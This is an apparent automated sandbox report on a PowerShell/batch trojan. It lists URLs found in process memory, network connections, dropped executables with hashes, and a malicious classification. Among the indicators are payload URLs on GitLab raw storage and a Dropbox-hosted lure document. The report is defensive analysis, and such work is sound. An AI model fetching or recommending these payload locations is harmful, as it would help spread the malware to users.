                Source: powershell.exe, 0000000B.00000002.1742112837.0000022CAF5C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742112837.0000022CAF481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025135434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022C9F411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251339C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2934757524.000001B1921F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022C9F411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251339C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2934757524.000001B1921F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                Source: powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: targets.vc.18.drString found in binary or memory: https://core.tcl-lang.org/tips/doc/main/tip/477.md)
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025133BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251345F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                Source: powershell.exe, 0000000D.00000002.2834762323.0000025131A80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2895650361.000002514BC95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip
                Source: powershell.exe, 0000000D.00000002.2895893087.000002514BCD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/fgsd1/gg/-/raw/main/fga1312.zip
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.00000251345F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                Source: pywin32_postinstall.py.18.drString found in binary or memory: https://mhammond.github.io/pywin32_installers.html
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                Source: powershell.exe, 0000000B.00000002.1742112837.0000022CAF5C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742112837.0000022CAF481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2887360649.0000025143A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com/cd/0/get/Cgf_M__sO2v5p-OouMPp6PUPdVW_
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                Source: powershell.exe, 0000000B.00000002.1744952074.0000022CB7410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.doc
                Source: powershell.exe, 0000000B.00000002.1745787846.0000022CB7530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/garmin_campaign_information_for_partners_v6.doc
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025135007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49731 version: TLS 1.2

                System Summary

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B96354511_2_00007FFD9B963545
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAD0FF218_2_00007FFD9BAD0FF2
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\Scripts\normalizer.exe 507498BC73E06611171AB5C765ACE6C8976C8025829EA31F332AB5A89B7CCED6
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\Scripts\pip.exe 00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\Scripts\pip3.12.exe 00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                Source: classification engineClassification label: mal92.troj.evad.winBAT@28/271@3/2
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
